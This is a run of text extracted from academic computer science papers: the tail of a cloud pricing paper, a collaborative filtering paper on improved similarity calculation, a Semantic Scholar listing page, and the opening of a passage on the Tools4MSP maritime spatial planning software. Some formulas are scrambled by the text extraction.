subscribe cloud services if they have higher values for using cloud services, and if cloud users have more elastic demand for cloud services, cloud provider will get more revenue. The above analysis imply that cloud provider can set higher prices for these cloud users who are more willing to pay and who have higher elastic demands. Figure.8 The revenues of cloud provider vary with different number of VM instances. Optimal Pricing Strategies for Resource Allocation in IaaS Cloud 67 Figure.9 The revenues of cloud provider vary with different cloud users’ types. Acknowledgment This paper is supported by the following projects, Anhui Key research projects of Humanities and Social Sciences (SK2016A0207), and Suzhou Regional Collaborative Innovation Center (2016szxt05). References [1] J. Mei, K. Li, A. Ouyang et al. “A Profit Maximization Scheme with Guaranteed Quality of Service in Cloud Computing,” in press. [2] R. Buyya, C.S. Yeo, and S. Venugopal, “Market Oriented Cloud Computing: Vision, Hype, and Reality for Delivering it Services as Computing Utilities,” Proc. 10th IEEE Conference on High Performance Computing and Communications (HPCC 2008), Dalian, China, pp. 5-13, Sep. 2008. [3] M. Armbrust, A. Fox, R. Griffith, A. D. Joseph, R. Katz, A. Konwinski,G. Lee, D. Patterson, A. Rabkin, I. Stoica, and M. Zaharia. A view of cloud computing. Commun. ACM, 53(4):50–58, 2010. [4] S. K. Garg, S. Versteeg, and R. Buyya. A framework for ranking of cloud computing services. Future Gneration Computer Systems, 29:1012–1023, 2013. [5] Amazon EC2. http://aws.amazon.com/ec2/instance-types/.GoGrid Pricing. http://www.gogrid.com/pricing. [6] Q. Wang, K. Ren, and X. Meng. When cloud meets ebay: Towards effective pricing for cloud computing. In IEEE INFOCOM, 2012. [7] H. Xu and B. Li. Dynamic cloud pricing for revenue maximization. IEEE Transactions on Cloud Computing, 1(2):158–171, July 2013. [8] Y. Feng, B. Li, and B. Li. Price competition in an oligopoly market with multiple iaas cloud providers. IEEE Transactions on Computers, 63(1):59–73, Jan 2014. [9] D. Fudenberg and J. Tirole, Game Theory, MIT Press, Cambridge, USA, 1991. [10] S.Y. Yun, Y. YI, D. H. Cho, et al. The economic effects of sharing femtocells. IEEE Transactions on Selected Areas in Communications, 30(3): 595-606, April. 2012. work_inn62q2rznhknhfgujiaek3ctm ---- Paper Title (use style: paper title) 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 97 A Collaborative Filtering Recommendation Algorithm with Improved Similarity Calculation Yang Ju a , Liu Bailin b and Zhao Zhixiang School of Computer Science and Engineering, Xi'an Technological University Xi'an, 710021, Shaanxi State and Provincial Joint Engineering Lab. of Advanced Network and Monitoring Control Xi'an, 710021, China e-mail: a yangju90@163.com, b 498194312@qq.com Abstract—In order to improve the accuracy of the proposed algorithm in collaborative filtering recommendation system, an Improved Pearson collaborative filtering (IP-CF) algorithm is proposed in this paper. The algorithm uses the user portrait, item characteristics and data of user behavior to compute the baseline predictors model. Instead of the traditional algorithm's similarity calculation, the prediction model is used to improve the accuracy of the recommendation algorithm. Experimental results on Moivelens dataset show that the IP-CF algorithm significantly improves the accuracy of the recommended results, and the RMSE and MAE evaluation results are better than the traditional algorithms. Keyword-Recommendation Algorithm; Collaborative Filtering; Similarity Calculation; Baseline Predictors Model I. INTRODUCTION With the rapid development of computer technology and network technology, the number of network information services and applications is growing rapidly. China Internet Network Information Center reported statistics, as of June 2016, the size of China's Internet users reached 710 million, a total of 21.32 million new netizens in half a year [1] . With the increase in the number of people on the Internet, Internet information has also seen explosive growth. How to find interesting and effective information in this vast data is a very difficult thing. In order to solve this problem, academia and industry put forward personalized recommendation system [2] . According to the user's personal information and historical habits, it can discover the potential interest of the user and recommend the resources of interest to the user actively. Personalized recommendation system is a special form of information filtering system [3] . The recommendation system can be divided into the following categories: collaborative filtering recommendation system, content-based recommendation system and hybrid recommendation system. Because of its wide applicability, strong interpretability and good stability, the collaborative filtering recommendation system based on neighborhood model is widely used in various fields. Therefore, this paper focuses on the collaborative filtering recommendation system based on neighborhood model. The accuracy of recommendation results in the recommendation system is the main index to measure the recommendation effect. Sarwar et al. [4] proposed an item- based collaborative filtering recommendation algorithm that looked into cosine-based similarity to compute the similarity between products. This method provides dramatically better performance than traditional recommendation algorithm, while at the same time providing better accuracy. Chen and Cheng [5] use the rating data to compute the similarity between users, and use the ranking data as the weight of similarity calculation. Yang and Gu [6] propose to use user behavior information to construct the user's interest points and use the interest points to compute the similarity between users. Experiments show that these methods are better than the classic collaborative filtering algorithm. However, these methods only consider the user-item behavioral data, and neglect the user portrait and item features, which causes deviations in the accuracy of the recommendation result. This paper improves similarity calculation method in collaborative filtering recommendation algorithm based on neighborhood model, and uses the user portrait, item characteristics and user-item behavior data to compute similarity. We experimentally evaluate our results and compare them to the classic collaborative filtering algorithm. Experiments suggest that the improved similarity calculation method can improve the accuracy of the recommended results. II. COLLABORATIVE FILTERING RECOMMENDATION ALGORITHM BASED ON NEIGHBORHOOD MODEL Collaborative filtering recommendation algorithm is to select the same custom hobby user groups, use other people's experience to meet their own needs, in order to achieve the purpose of reducing overhead. Typically, the workflow of a collaborative filtering system is: (1) Compute the similarity between users. (2) Determine the neighbor set. Find the k users whose user interest is the most similar through the similarity size, and set these users as the user sets. (3) According to the user sets prediction rating. The system recommends items that the users have rated highly but not yet being rated by this user. The most important thing in collaborative filtering algorithm is similarity calculation. For the calculation of 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 98 similarity, the researchers put forward a variety of similarity calculation methods. Cosine-based similarity: For user u and user v , ( )N u denotes the set of positive feedback items for user u , and ( )N v denotes the set of positive feedback items for user v . And similarity between items u and v , denoted by ( , )sim u v is given by: )()( )()( ),( vNuN vNuN vusim    Pearson correlation coefficient [7-8] : In this case, similarity is computing based on the vector of the rating. Among them, u r in the formula has two forms in the traditional recommendations. One is the average rating of user u , and the other is the average rating of item i scored by all users. The Pearson correlation is given by: 2 2 ( )( ) (u,v) ( ) ( ) uv uv uv ui u vi v i I ui u vi v i I i I r r r r sim r r r r             The similarity between users can be calculated by the above formula, and the similarity ranking of each user with other users can be obtained to obtain the nearest neighbor user set. After getting the user set, the next step is interest prediction computation. We can denote the prediction ( , )p u i as:    )(),( ),(),( iNKuSv virvusimiup  III. IMPROVED SIMILARITY MEASURES This paper considers the user rating data from the overall situation, introduces the characteristics of personal habits, item quality and category to improve the similarity computation formula. Thus the approximated correlation coefficient is given by:        nmnm nm Pv nini Pv mimi Pi ninimimi nm brbr brbr S ,, , 22 , )()( ))((  Here, ,m n S denotes the similarity between user m and n. mi r is the raw rating of the user m for the item i . ,m nP represent the user m, n common rating set. mi b is a baseline predictors for rating mi r . The baseline predictors model is as follows:    iGg gimmi cbbb    denotes the intercept of the baseline predictors model. The parameters m b and i b indicate the deviations of user m and item i , respectively, from the average. The last term of the formula denotes the preference of the user on the item category. i G represents the set of categories to which the item belongs. Here we use an example to illustrate the baseline predictors model. Create a baseline predictors model for the rating of movie i for user m . Assume that the mean rating of all the movie scores is 3.5. m is a critical user, who tends to rate 0.3 stars lower than the average. i is a movie with a relatively high standard, so its rating is 0.5 stars higher than the average rating. In addition, the movie i belong to , , x y z c c c , with a bias relative to the average of -0.05, 0.08, 0.12. Therefore, the prediction for the movie i rating by user m is 3.5-0.3+0.5-0.15+0.18+0.12=3.85. For this formula, the purpose is to find m b , i b and g c . This paper solves the problem by solving the least-squares problem [9-11] . The cost function formula is as follows:    iGg giumimi cbbre   )()(min 222 ),( 2        Ii Ii Gg gi Um m im mi i cbbe    In the above (6) formula, r mi is the true value of user for item. In formula (7),  represents the set of user ratings for items, U represents user set, and I represents the set of item. The solution process is to obtain the best fitting m b , i b and g c by minimizing the first term 2 ( , ) ( ) mi m i e   in equation (7). The second item is the L1 regular, that is added to prevent overfitting. The size of  indicates the degree of intervention to fit, and the larger the general  is, the smoother the fitting curve is. Because the proposed model of this paper is different from the traditional one, the data matrix cannot be directly applied to the training of the model. So the matrix of the training data is restructured, adding personal habits, item quality and category bias. For example, when a movie i was released, it was called a masterpiece of elements such as comics, entertainment, suspense, etc. These classified data were useful for the model but could not be used. Through the transformation of the data format, useful information is used, and the information is vectorized according to the classification categories. Each row of data through the transformation training matrix can be expressed as: 1 1 1 {( , ), ... , ... , ... , | } m n j ui u i u u i i c c r c G . 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 99 TABLE I. TRAINING DATA MATRIX ),( iu 1u ... mu 1i ... ni 1c ... jc uir (1,1) 1 ... 0 1 ... 0 1 ... 0 4 ... ... ... ... ... ... ... ... ... ... ... (1,n) 1 ... 0 0 ... 1 0 ... 0 2 ... ... ... ... ... ... ... ... ... ... ... (m,n) 0 ... 1 0 ... 1 1 ... 1 5 TABLE II. MOIVELENS DATASET INFORMATION Version users movies size Sparsity ML 943 1682 100K 93.695% The training data matrix is shown in Table . The complete algorithm steps are described as follows: a) Compute the baseline predictors model. According to the formula (5) combined with the rating matrix, personal habits, item quality and category, the least square method is used to solve for mi b , m b , i b , and i g g G c   . The solution formulas are (6) and (7). b) Compute similarity. Using formula (4), compute the similarity between each two users. c) Getting a set of nearest neighbors. According to the similarity computed in the steps (b), we sort the nearest neighbors of user m that need to be predicted, and determine the relevant user set k m S according to sorting order and k. d) Rating prediction. According to formula (3), system recommends items that the users have rated highly but not yet being rated by this user. IV. EXPERIMENTAL EVALUATION A. Data Set And Evaluation Metrics In order to verify the actual recommendation effect of the proposed algorithm (Improved Pearson Similarity Collaborative Filtering, IP-CF) in this paper, the MoiveLens film data set was used for verification. This data set consists of: ①100,000 ratings (1-5) from 943 users on 1682 movies. ②User data and item data have simple feature portraits. ③ Users with less complete personal portraits and fewer comments in the data have been cleaned. The dataset information is shown in Table . Select the root mean square error (RMSE) and mean absolute error (MAE) to evaluate the accuracy of the recommendation algorithm on the rating data [12-13] . The smaller the value, the higher the accuracy of the prediction. For a user u and item i in the test set, uir is the actual rating, uir̂ is the predicted rating, and T is the total number Figure 1. Comparison of precision between IPCF algorithm and traditional algorithm of items that need to be predicted. The RMSE and MAE formulas are as follows:     Tiu uiui rr T RMSE , 2 ˆ 1     Tiu uiui rr T MAE , ˆ 1  B. Experimental Results 1) Comparison of accuracy of recommendation algorithms The traditional cosine similar algorithm (Cosine-CF) and Pearson similar algorithm (Pearson-CF) were compared with the proposed algorithm (IP-CF). We tested them on our data sets by computing RMSE and MAE. The size k of similar user set is from 5 to 180. Figure 1 shows the experimental results. It can be observed from the results that the RMSE and MAE values of the improved similarity algorithm proposed in this paper decrease with the increase of the neighborhood. When the number of near-neighbor sets reaches a certain amount, it tends to a fixed value. The traditional collaborative filtering algorithm (Pearson similarity and cosine similarity) needs to find the optimal result, if the number is too large, it will affect the accuracy of the recommendation result. Overall, the RMSE and MAE of the rating prediction are 0.82% and 1.16% lower than the Figure 2. Comparison between the baseline predictors model and the traditional model 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 100 traditional algorithm respectively. The IP-CF algorithm has better accuracy. 2) Comparison of accuracy of baseline predictors The following experiments verify the effectiveness of the baseline predictors model. The experiment compares the user mean model (BU), basic baseline predictors model (BP), and improved baseline predictors model (UBP). Experimental results show that the improved baseline predictors model significantly improves the accuracy of the baseline prediction. V. CONCLUSION In this paper, a collaborative filtering recommendation algorithm based on improved similarity computation is proposed, which takes into account user portrait, item characteristics and user behavior data in recommendation process. Experiments have shown that user portraits and item features played an important role in improving the accuracy of recommendations, and which are an important basis for analyzing potential needs. Secondly, we found that in the Top-N recommendation, the number of neighbors and the evaluation index are not a positive or negative relationship, and the size of the neighbor will affect the accuracy of the recommendation. Our further work will research the relationship between the number of neighbors and the effectiveness of recommendations, especially how to choose the best neighbor value to improve the accuracy of recommendations. REFERENCES [1] Statistical Report on Internet Development in China[R]. China Internet Network Information Center, 2017. [2] Borkar V, Carey MJ, Li C. Inside Big Data management:ogres, onions, or parfaits[C]. Proceedings of the 15th International Conference on Extending Database Technology. ACM, 2012:3-14. [3] WANG Guoxia, LIU Heping. Survey of personalized recommendation system[J]. Computer Engineering and Applications, 2012, 48(7), 66-76. [4] Sarwar B, Karypis G, Konstan J, et al. Item based collaborative filtering recommendation algorithms[C]. Proc 10th Int’l WWW Conf, Hong Kong, 2001:1-5. [5] Chen YL , Cheng LC. A novel collaborative filtering approach for recommending ranked items[C]. Expert Systems with Applications, 2008, 34(4): 2396 -2405. [6] Yang MH, Gu ZM. Personalized recommendation based on partial similarity of interests[C]. Advanced Data Mining and Applications Proceedings, 2006, 4093:509-516. [7] FU He-gang, WANG Zhu-wei. Improvement of Item-Based Collaborative Filtering Algorithm[J]. Journal of Chongqing University of Technology(Natural Science), 2010(9):71-72． [8] GUO Lei, MA Jun. Incorporating Item Relations for Social Recommendation[J]. Chinese Journal of Computers, 2014, 37(1):220- 227. [9] X. Luo, Xia, Y. and Zhu, Q. Incremental collaborative filtering recommender based on regularized matrix factorization[J]. Knowledge-Based Systems, 2012, 27, pp.271-280. [10] SUN Chen, XI Hongsheng, GAO Rong. A Recommendation-Support Model Using Neighborhood-Based Linear Least Squares Fitting[J]. Journal of Xi'an Jiaotong University, 2015, 49(6), 78-83. [11] C. Rana, and Jain, S.K. A study of the dynamic features of recommender systems[J]. Artificial Intelligence Review, 2015, 43(1), pp.141-153. [12] Item-network-based collaborative filtering: A personalized recommendation method based on a user’s item network[J]. Taehyun Ha, Sangwon Lee. Information Processing and Management. 2017(5). [13] Gai Li, Zhiqiang Zhang, et al. One-Class Collaborative Filtering Based on Rating Prediction and Ranking Prediction[J]. Knowledge- Based Systems. 2017. work_ipnice3j5bdd5pqvvm65vhivse ---- [PDF] Digital Scientific Notations as a Human-Computer Interface in Computer-Aided Research | Semantic Scholar Skip to search formSkip to main content> Semantic Scholar's Logo Search Sign InCreate Free Account You are currently offline. Some features of the site may not work correctly. DOI:10.7287/peerj.preprints.26633v1 Corpus ID: 47234108Digital Scientific Notations as a Human-Computer Interface in Computer-Aided Research @article{Hinsen2018DigitalSN, title={Digital Scientific Notations as a Human-Computer Interface in Computer-Aided Research}, author={K. Hinsen}, journal={PeerJ Prepr.}, year={2018}, volume={6}, pages={e26633} } K. Hinsen Published 2018 Computer Science PeerJ Prepr. Most of today's scientific research relies on computers and software not only for administrational tasks, but also for processing scientific information. Examples of such computer-aided research are the analysis of experimental data or the simulation of phenomena based on theoretical models. With the rapid increase of computational power, scientific software has integrated more and more complex scientific knowledge in a black-box fashion. As a consequence, its users do not know, and don't even… Expand View via Publisher peerj.com Save to Library Create Alert Cite Launch Research Feed Share This Paper Figures and Topics from this paper figure 1 figure 2 figure 3 figure 4 figure 5 figure 6 View All 6 Figures & Tables Black box Human–computer interaction Computation Simulation Computer References SHOWING 1-10 OF 44 REFERENCES SORT BYRelevance Most Influenced Papers Recency Computer Simulations and Computational Models in Science C. Imbert Computer Science 2017 6 View 1 excerpt, references background Save Alert Research Feed Functional declarative language design and predicate calculus: a practical approach R. Boute Computer Science TOPL 2005 21 PDF View 1 excerpt, references background Save Alert Research Feed The Role of Programming in the Formulation of Ideas G. Sussman, J. Wisdom Computer Science 2002 6 View 2 excerpts, references background Save Alert Research Feed A Primer on Scientific Programming with Python H. Langtangen Computer Science 2009 101 PDF View 1 excerpt, references background Save Alert Research Feed Structure and interpretation of classical mechanics G. Sussman, J. Wisdom, M. E. Mayer Physics, Computer Science 2001 137 View 1 excerpt, references background Save Alert Research Feed User interfaces for computational science: A domain specific language for OOMMF embedded in Python M. Beg, R. Pepper, H. Fangohr Computer Science, Physics 2016 20 Highly Influential PDF View 6 excerpts Save Alert Research Feed Computational science: shifting the focus from tools to models. K. Hinsen Medicine F1000Research 2014 7 View 1 excerpt, references background Save Alert Research Feed Modelica - A Unified Object-Oriented Language for System Modelling and Simulation Peter Fritzson, Vadim Engelson Computer Science ECOOP 1998 329 PDF View 2 excerpts, references background Save Alert Research Feed Computer Science and its Relation to Mathematics D. Knuth Computer Science, Mathematics 1974 131 View 1 excerpt, references background Save Alert Research Feed Computational science: ...Error Z. Merali Medicine, Physics Nature 2010 177 PDF Save Alert Research Feed ... 1 2 3 4 5 ... Related Papers Abstract Figures and Topics 44 References Related Papers Stay Connected With Semantic Scholar Sign Up About Semantic Scholar Semantic Scholar is a free, AI-powered research tool for scientific literature, based at the Allen Institute for AI. Learn More → Resources DatasetsSupp.aiAPIOpen Corpus Organization About UsResearchPublishing PartnersData Partners FAQContact Proudly built by AI2 with the help of our Collaborators Terms of Service•Privacy Policy The Allen Institute for AI By clicking accept or continuing to use the site, you agree to the terms outlined in our Privacy Policy, Terms of Service, and Dataset License ACCEPT & CONTINUE work_iqzi6a2wjbfc3g23fyfonvnujm ---- Submitted 13 March 2018 Accepted 4 September 2018 Published 1 October 2018 Corresponding author Stefano Menegon, stefano.menegon@ismar.cnr.it, ste.menegon@gmail.com Academic editor James Procter Additional Information and Declarations can be found on page 12 DOI 10.7717/peerj-cs.165 Copyright 2018 Menegon et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Tools4MSP: an open source software package to support Maritime Spatial Planning Stefano Menegon, Alessandro Sarretta, Daniel Depellegrin, Giulio Farella, Chiara Venier and Andrea Barbanti Institute of Marine Sciences, National Research Council, Venice, Italy ABSTRACT This paper presents the Tools4MSP software package, a Python-based Free and Open Source Software (FOSS) for geospatial analysis in support of Maritime Spatial Planning (MSP) and marine environmental management. The suite was initially developed within the ADRIPLAN data portal, that has been recently upgraded into the Tools4MSP Geoplatform (data.tools4msp.eu), an integrated web platform that supports MSP through the application of different tools, e.g., collaborative geospatial modelling of cumulative effects assessment (CEA) and marine use conflict (MUC) analysis. The package can be used as stand-alone library or as collaborative webtool, providing user- friendly interfaces appropriate to decision-makers, regional authorities, academics and MSP stakeholders. An effective MSP-oriented integrated system of web-based software, users and services is proposed. It includes four components: the Tools4MSP Geoplatform for interoperable and collaborative sharing of geospatial datasets and for MSP-oriented analysis, the Tools4MSP package as stand-alone library for advanced geospatial and statistical analysis, the desktop applications to simplify data curation and the third party data repositories for multidisciplinary and multilevel geospatial datasets integration. The paper presents an application example of the Tools4MSP GeoNode plugin and an example of Tools4MSP stand-alone library for CEA in the Adriatic Sea. The Tools4MSP and the developed software have been released as FOSS under the GPL 3 license and are currently under further development. Subjects Data Science, Scientific Computing and Simulation, Spatial and Geographic Information Systems Keywords Python, SDI, Tools4MSP software, Open Source, Cumulative Effects Assessment, Maritime spatial planning, GeoNode INTRODUCTION Management and planning of the marine environment require a coordinated development of socio-economic activities, while ensuring a sustainable use of marine resources using an ecosystem-based approach (European Union, 2014; Center for Ocean Solutions, 2011; Douvere, 2008). In the last decade, practical tools to support the implementation of the various steps of Maritime Spatial Planning (MSP) have been developed in various contexts and also analysed to evaluate their usability for different planning purposes (Stelzenmüller et al., 2013; Pınarbaşı et al., 2017). How to cite this article Menegon et al. (2018), Tools4MSP: an open source software package to support Maritime Spatial Planning. PeerJ Comput. Sci. 4:e165; DOI 10.7717/peerj-cs.165 https://peerj.com mailto:stefano.menegon@ismar.cnr.it mailto:ste.menegon@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.165 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.165 An extended analysis performed by the ‘‘EBM tools network’’ (https://ebmtoolsdatabase. org/) in support of Ecosystem Based Management has recollected and classified various tools, with respect to types, costs, skills, data and technological requirements. Two categories of tools have emerged in the recent years as analytical support to decision-makers: the sea use conflict analysis and the cumulative impacts assessment. Sea use conflict analysis has been extensively applied in different geographical contexts (Hadjimitsis et al., 2015; White, Halpern & Kappel, 2012) to investigate and spatially identify conflicts between coastal and marine activities for current conditions and for the comparison of possible future scenarios. In particular, the COEXIST project developed the GRID tool (Georeferenced Interactions Database; Gramolini et al., 2010) to analyse the level of coexistence among uses, depicting areas where different sectors more likely overlap in space and time. In parallel, various authors proposed methodologies to create cumulative impact maps to reconnect effects of human uses of the sea on environmental components, starting from the methodology firstly introduced by Halpern et al. (2008) at global scale, then implemented in several marine regions, such as Baltic Sea (Korpinen, Meidinger & Laamanen, 2013), North Sea (Andersen et al., 2013), Adriatic Sea (Depellegrin et al., 2017) and at regional scale (Barbanti et al., 2017a; Barbanti et al., 2017b). In particular, Stock (2016) developed an open source software for mapping human impacts on marine ecosystems. The MSP process involves several user categories, from data producers (e.g., domain experts like ecologists and modellers) to stakeholders and planners. It requires a solid command of geographical information to create a more comprehensive understanding of coastal and marine areas and to support management and planning policies. The development and implementation of Spatial Data Infrastructures (SDI) at multiple levels (i.e., local, regional, national and global) matches the need to make geographical data more accessible and interoperable (Georis-Creuseveau, Claramunt & Gourmelon, 2016). However, various authors (Maguire & Longley, 2005) have highlighted the importance of the integration of Geoportals in the context of SDIs and the role of a user-driven and community-based development as fundamental aspects for an effective and efficient use of the resources (De Longueville, 2010; Georis-Creuseveau, Claramunt & Gourmelon, 2016). This research presents components and functionalities of the Tools4MSP software package, a Python-based Free and Open Source Software (FOSS) which implements a marine use conflict (MUC) analysis module based on the COEXIST methodology (Gramolini et al., 2010) and a cumulative effects assessment (CEA) module based on the methodology developed in Menegon et al. (2018a). Its implementation in the context of a collaborative Geoplatform supporting MSP and environmental management and its utilization as stand-alone library for cumulative effects assessment (CEA) is tested for the Adriatic Sea. Menegon et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.165 2/16 https://peerj.com https://ebmtoolsdatabase.org/ https://ebmtoolsdatabase.org/ http://dx.doi.org/10.7717/peerj-cs.165 BACKGROUND MUC and CEA analysis The Maritime Use Conflict (MUC) tool implements the COEXIST methodology to estimate the spatial distribution of the conflicts between sea uses. The inputs of the tool are: (i) the area of analysis; (ii) the grid cell resolution; (iii) layers of presence/absence for each human use present in the area (e.g., location of aquacultures, location of oil and gas platforms); (iv) an expert based characterization for each human use through four attributes (vertical scale, spatial domain, temporal domain and mobility). According to the attributes of each use three pre-defined rules, included in the COEXIST methodology are dynamically applied to estimate the potential conflict score for each pair of uses. The potential score varies from 0 (no conflict) to 6 (very high conflict). Afterwards, the area of analysis is subdivided into regular grid cells according to the specified resolution and, on each cell, information about spatial overlapping human uses are extracted. Finally, on each cell the total MUC score is calculated summarizing the potential conflict score for each pair of overlapping uses. The main output is a geospatial distribution of MUC score over the entire area of analysis. For a detailed explanation of the rules and algorithm we refer to Gramolini et al. (2010) and Barbanti et al. (2015). The Cumulative Effects Assessment (CEA) tool implements the methodology described in Menegon et al. (2018a). Formally, we consider ‘‘CEA as a systematic procedure for identifying and evaluating the significance of effects from multiple pressures and/or activities on single or multiple receptors. CEA provides management options, by quantifying the overall expected effect caused by multiple pressures and by identifying critical pressures or pressure combinations and vulnerable receptors. The analysis of the causes (source of pressures), pathways, interactions and consequences of these effects on receptors is an essential and integral part of the process’’ (Judd, Backhaus & Goodsir, 2015). The inputs of the Tools4MSP CEA tool are: (i) the area of analysis; (ii) the grid cell resolution; (iii) layers representing intensity or presence/absence of human uses (e.g., intensity of fishery and maritime transport, presence of aquacultures and oil & gas platforms); (iv) layers representing intensity or presence/absence of environmental components (e.g., seabed habitats, probability of presence of nursery habitats, probability of presence of marine mammals); (v) use-specific relative pressure weights and distances of pressure propagation; (vi) environmental component sensitivities related to specific pressures or more general ecological models that describe the response of the environmental components to a specific pressure. Similarly to the MUC tool, the area of analysis is subdivided into regular grid cells. Then, on each cell, information about the presence of human uses and environmental components are extracted. Afterwards, the geospatial layers on human uses are propagated and combined to estimate the geospatial distribution of different pressures (e.g., marine litter, underwater noise, abrasion) for the entire analysis area. Finally, the geospatial distribution of single and cumulative effects and impacts are estimated combining together the pressure layers and the environmental components layers through a sensitivity score. Menegon et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.165 3/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.165 Figure 1 Interaction diagram between the Tools4MSP Geoplatform, external applications and poten- tial end-users. Component 1.b and 2 (blue background) are developed and released with the Tool4MSP package. Full-size DOI: 10.7717/peerjcs.165/fig-1 The MSP-oriented integrated system In Fig. 1 the interactions between the Tools4MSP Geoplatform, external application and potential end-users are presented. As a whole, they represent an integrated system of software, users and web services capable to effectively support MSP activities. Overall, the system can be described by four components: Component 1: Tools4MSP Geoplatform The geoplatform is a community-based integrated web application. Data are managed in a SDI over the entire workflow, from the collaborative upload in a web portal, to the creation of metadata, the choice of appropriate visual encodings, the composition of maps, the set up of use cases and the elaboration through specific modules producing final maps and descriptive reports. Internally, the Tools4MSP Geoplatform is divided into two sub-components: the Geospatial Content Management System (CMS; 1.a) and the Tools4MSP package (1.b). A more detailed description of the Geoplatform is given in the next section. Component 2: Tools4MSP package as stand-alone library The package can also be downloaded and used as stand-alone library independently from the GeoNode software. The library can be efficiently used through Jupyter Notebook (Kluyver et al., 2016; https://jupyter.org/), a web-based computational environment, which provides one of the most convenient user interfaces for interactive analysis (McGibbon et al., 2015; Shen, 2014). The software allows the authoring of shareable and reproducible Menegon et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.165 4/16 https://peerj.com https://doi.org/10.7717/peerjcs.165/fig-1 https://jupyter.org/ http://dx.doi.org/10.7717/peerj-cs.165 notebook documents which allow a combination of input code, rich media representations of the output results, explanatory text, mathematics, images forming a rich computational narrative (Kluyver et al., 2016). Regarding the Tools4MSP development, the Jupyter Notebook supports rapid prototyping of new features, libraries testing and advanced analysis of case studies (Fig. 1, components 2). Component 3: Desktop applications Spatial layers and maps managed in the Geoplatform can be downloaded in different formats directly from the web interface or can be reused in desktop GIS applications for further investigation by connecting to standard web services. Data curation can be also improved using the desktop GIS QGIS (QGIS Development Team, 2018) together with the GeoServer explorer plugin (Boundless, 2018). This plugin eases the publication, upload and visual encoding of data and layers, allowing collaborators and domain experts to better contribute to the update and maintenance of the Geoplatform content. Component 4: Third party data repositories MSP-related workflows need relevant and updated data to be analysed and processed, the interaction between this component and the Tools4MSP Geoplatform highlights the ability of the system to integrate data from other data portals and SDIs, such as SHAPE Adriatic Atlas (http://atlas.shape-ipaproject.eu/), EMODnet portals (http: //www.emodnet.eu/), EEA services (https://www.eea.europa.eu/data-and-maps), CoCoNet web GIS (http://coconetgis.ismar.cnr.it/) or the European Atlas of the Seas (https: //ec.europa.eu/maritimeaffairs/atlas/maritime_atlas). All these portals use interoperable OGC-compliant web services to exchange spatial information; based on GeoNode features, the Tools4MSP Geoplatform allows users to display external layers (e.g., served from remote Web Map Services; OGC, 2006) and enriches its catalogue with relevant data through the harvesting of standard web services (GeoNode remote services). The creation and maintenance of this network of collaborations allow to harmonize existing multiple efforts and improve the availability of spatial datasets for users interested in MSP-related information. The Tools4MSP Geoplatform In Fig. 2 the detailed implementation architecture of the Tools4MSP Geoplatform is presented. The Geospatial CMS is the core of the system and is based on the GeoNode (GeoNode, Developers and Contributors Team, 2018) software, a Django-based web platform for developing community-based SDI. GeoNode facilitates the upload and management of geospatial datasets, making them discoverable and available via standard Open Geospatial Consortium (OGC) protocols and web mapping applications. GeoNode also allows users to automatically upload, describe and share the outputs produced by the Tools4MSP package. The Tools4MSP package is Python-based open source software available on github (Menegon, 2018a). The Tools4MSP core library implements the algorithms for CEA and MUC geospatial modelling and the base functionalities to read the input geospatial datasets and configurations, to apply data transformation operations (such as normalization, Menegon et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.165 5/16 https://peerj.com http://atlas.shape-ipaproject.eu/ http://www.emodnet.eu/ http://www.emodnet.eu/ https://www.eea.europa.eu/data-and-maps http://coconetgis.ismar.cnr.it/ https://ec.europa.eu/maritimeaffairs/atlas/maritime_atlas https://ec.europa.eu/maritimeaffairs/atlas/maritime_atlas http://dx.doi.org/10.7717/peerj-cs.165 Figure 2 Implementation architecture of the Tools4MSP collaborative Geoplatform. Full-size DOI: 10.7717/peerjcs.165/fig-2 aggregation, reclassification, gaussian convolution, geospatial filtering) and to manage and write model output results. Tools4MSP adopts a grid-based approach for efficient numerical computation of the geospatial models. The grid-based functionalities are provided through the general purpose RectifiedGrid library (Menegon, 2018b), that ensures direct integration of a multitude of different datasets and facilitates data preparation procedures. It simplifies the access and rasterization of multi-format geospatial data (environmental and anthropogenic datasets) and performs arithmetic and transformation operations on raster map layers. RectifiedGrid combines several FOSS Python projects: (1) NumPy and SciPy for efficient numerical computation (Van der Walt, Colbert & Varoquaux, 2011) and (2) rasterio and fiona (Mapbox, Rasterio Development Team, 2018; Fiona, Developers and Contributors team, 2018) for multi-format raster and vector data access through the Geospatial Data Abstraction Library (GDAL; Warmerdam, 2008). Interactive graphics for visualization of output results are based on the Bokeh visualization library (Bokeh Development Team, 2018). Different users can have different modes of interaction with the Geoplatform: administrators perform the case study setup, by specifying the connectors to the geospatial repositories and defining the pre-processing chain for environmental and human use layers harmonization and utilization in the case study (Fig. 2, Case Study setup GUI). A broad user community composed by decision-makers, planners, academics, research institutions, MSP stakeholders and the general public can use the case study configuration to run the build-in version of the Tools4MSP library implemented in the Geoplatform (Fig. 2, Webtool GUI). More in detail, the Tools4MSP Webtool GUI implements a four step Menegon et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.165 6/16 https://peerj.com https://doi.org/10.7717/peerjcs.165/fig-2 http://dx.doi.org/10.7717/peerj-cs.165 workflow: (Step 0) Webtool selection (MUC or CEA); (Step 1) case study selection, choosing from a pre-set of case studies; (Step 2) case study configuration, optionally outlining a custom subregion of analysis or a custom combination of human uses, pressures, and environmental components; (Step 3) generation of geospatial and statistical outputs. The outputs are published in GeoNode and accessible through standard interoperable services. The produced reports, graphics and statistical outputs are archived in a dedicated data store catalogue and can be further visualized and re-used also by non technical stakeholders. In the results section an application of the Tools4MSP GeoNode plugin for case study setup and CEA analysis in the Adriatic Sea is provided. RESULTS At the current stage, the Tools4MSP modelling framework has been applied in various areas of interest in the Adriatic Sea, such as entire Adriatic Sea (Depellegrin et al., 2017), Italian Adriatic Sea (Menegon et al., 2018a) 